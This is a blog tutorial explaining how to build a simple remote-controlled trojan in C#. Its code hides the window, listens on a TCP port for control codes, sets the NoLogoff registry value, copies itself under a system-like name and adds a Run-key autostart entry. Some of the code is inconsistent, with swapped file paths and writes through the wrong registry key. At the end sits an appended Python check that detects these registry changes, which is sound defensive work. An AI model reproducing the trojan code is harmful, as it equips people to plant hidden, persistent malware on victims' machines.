[C#] Simple Trojan

xiaoxiao, 2021-03-06

Server-side development:

The Trojan's server-side program has three main jobs: running in the background (hiding), receiving control codes, and modifying the registry. Each of these is described below:

1. Creating a background program in Visual C# is easy. First create a new C# Windows application; the project name is up to you (though to stay hidden it should resemble a system name). Set the form's "ShowInTaskbar" property to false so that it does not appear in the taskbar when running, and set the "WindowState" property to Minimized so that the form is hidden. You can also set these in InitializeComponent(), which performs initialization and runs before the form is displayed. The code is as follows:

private void InitializeComponent()
{
    //
    // Form1
    //
    // Form display origin and size
    this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
    this.ClientSize = new System.Drawing.Size(368, 357);
    // Form name
    this.Name = "Form1";
    // Set the property so the form runs in the background
    this.ShowInTaskbar = false;
    this.Text = "Form1";
    this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}

2

public Form1() // Form constructor
{
    //
    // Windows Form Designer support
    //
    InitializeComponent();

    //
    // TODO: Add any constructor code after InitializeComponent
    //
    // Add your listening code here
    // The port can be configured; I use a fixed port
    int port = 6678;
    // System.Net.Sockets.TcpListener is used to listen for clients on a TCP network
    listener = new TcpListener(port);
    // Start the listener
    listener.Start();
    // Add the thread that receives control codes; to stop the thread, use Thread.Abort()
    // recontrolcode is the function the thread executes on start-up.
    // It selects the appropriate registry-modification function
    Thread thread = new Thread(new ThreadStart(recontrolcode));
    thread.Start();
}

The recontrolcode function is as follows; for the full code, see the program.

private void recontrolcode()
{
    // Set up the receiving socket; listener.AcceptSocket accepts a client request that has arrived
    socket = listener.AcceptSocket();
    // If the connection succeeded, keep running
    while (socket.Connected)
    {
        // Receive the control code
        byte[] by = new byte[6];
        int i = socket.Receive(by, by.Length, 0);
        string ss = System.Text.Encoding.ASCII.GetString(by);
        // Perform different functions according to the control code
        // Add the registry-modification code here
        switch (ss)
        {
            case "jiance": // Test the connection; return test information
                str = "hjc";
                byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
                socket.Send(bytee, 0, bytee.Length, 0);
                break;
            case "zx1000":
                // Registry-modification function, self-defined; see the analysis below
                unlogoff();
                // Return the control message
                retMessage();
                break;
            case "zx0100":
                // Registry-modification function
                unclose();
                // Return the control message
                retMessage();
                break;
            // The remaining cases repeat the pattern above and are omitted
            default:
                break;
        } // switch
    } // while
} // private void recontrolcode

3. To work with the registry in C#, use the Microsoft.Win32 namespace in the .NET class library, which provides two kinds of classes: those that handle events raised by the operating system and those that manipulate the system registry. Its usage is shown below. Here I wrote a subroutine that modifies the registry so that the computer cannot log off. First, some background on the registry: under the subkey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, setting the value NoLogoff to 1 prevents the computer from logging off. The following function uses C# to make the registry change:

private void unlogoff()
{
    // Get the top-level node of the host's registry
    Microsoft.Win32.RegistryKey rlocal = Registry.LocalMachine;
    // Declare a registry key variable
    RegistryKey key1 = null;
    try
    {
        // RegistryKey.OpenSubKey(string registrykey, bool canwrite) retrieves the specified subkey
        // registrykey is the key specified by the user; canwrite says whether it can be modified (default false, not modifiable)
        key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", true);
        // Set the value name and value under the subkey
        key1.SetValue("NoLogoff", 1);
        // Close the opened subkey
        key1.Close();
        // Set the warning string
        mystr = mystr + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff has been modified! Please set it to 0!";
    }
    catch { }
    // If the subkey does not exist, create it
    if (key1 == null)
    {
        try
        {
            // Use RegistryKey.CreateSubKey(string mystring) to create the subkey
            RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
            key2.SetValue("NoLogoff", 1);
            key2.Close();
            mystr = mystr + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff has been modified! Please set it to 0!";
        }
        catch { }
    }
}

4. Another important function in a Trojan program is self-copying and relocation. The Trojan must automatically hide itself in System or System32 to avoid discovery. The relocation code is analyzed below; its main function is to move the Trojan from D to C:\winnnt\system\Msdoss.exe, changing its name in the process. It uses the .NET namespace System.IO, which allows synchronous and asynchronous reading and writing of data streams and files. Here we use the System.IO.File class.

private void movecc1()
{
    try
    {
        // File.Move(string sourceFileName, string destFileName) moves a file
        // sourceFileName is the file to move; destFileName is the file's new path
        File.Move("C:\\Winnnt\\system\\Msdoss.exe", "d:\\winnt\\system32\\expleror.exe");
    }
    catch { }
    // Set the newly moved Trojan to start automatically. The analysis is the same as before
    try
    {
        key1 = rlocal.OpenSubKey("Software\\Microsoft\\Run", true);
        key1.SetValue("MicrosoftT", "D:\\winnt\\system32\\expleror.exe");
        key1.Close();
    }
    catch { }
    if (key1 == null)
    {
        try
        {
            RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
            key1.SetValue("MicrosoftT", "D:\\winnt\\system32\\expleror.exe");
            key1.Close();
        }
        catch { }
    }
} // movecc1()

That completes this simple C# Trojan.
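A defender's check for the two registry changes described in sections 3 and 4, as an added example (not code from the original article): it parses `reg query`-style text and flags `NoLogoff` set to 1 and Run-key entries whose executable name is a near miss of a system binary. The sample text, the `KNOWN` list and the edit-distance threshold of 2 are assumptions.

```python
import re

# Constructed sample in the layout printed by `reg query <key> /s`; not real host data.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    MicrosoftT    REG_SZ    D:\winnt\system32\expleror.exe
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoLogoff    REG_DWORD    0x1
"""

# Assumed short list of system binaries that are commonly imitated; extend for real use.
KNOWN = ("explorer.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "services.exe")
VALUE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")

def parse(text):
    """Yield (key, value_name, type, data) tuples from `reg query` style text."""
    key = None
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m and key:
            yield (key, *m.groups())
        elif line.strip():
            key = line.strip()  # an unindented line is a key path

def distance(a, b):
    """Levenshtein edit distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[-1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def audit(text):
    """Return findings for the logoff policy and lookalike autorun entries."""
    findings = []
    for key, name, typ, data in parse(text):
        k = key.lower()
        if k.endswith(r"\policies\explorer") and name.lower() == "nologoff":
            if typ == "REG_DWORD" and int(data, 16) == 1:
                findings.append(("logoff-disabled", key, name, data))
        elif k.endswith(r"\currentversion\run"):
            # Last path component, without any trailing arguments
            exe = re.split(r"[\\/]", data.strip('"').lower())[-1].split(" ")[0]
            if exe not in KNOWN and any(distance(exe, g) <= 2 for g in KNOWN):
                findings.append(("lookalike-autorun", key, name, data))
    return findings
```

On a live host the input would come from `reg query` run against the Run and Policies\Explorer keys; a lookalike name is a triage signal to check the file's path and signature, not a verdict.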
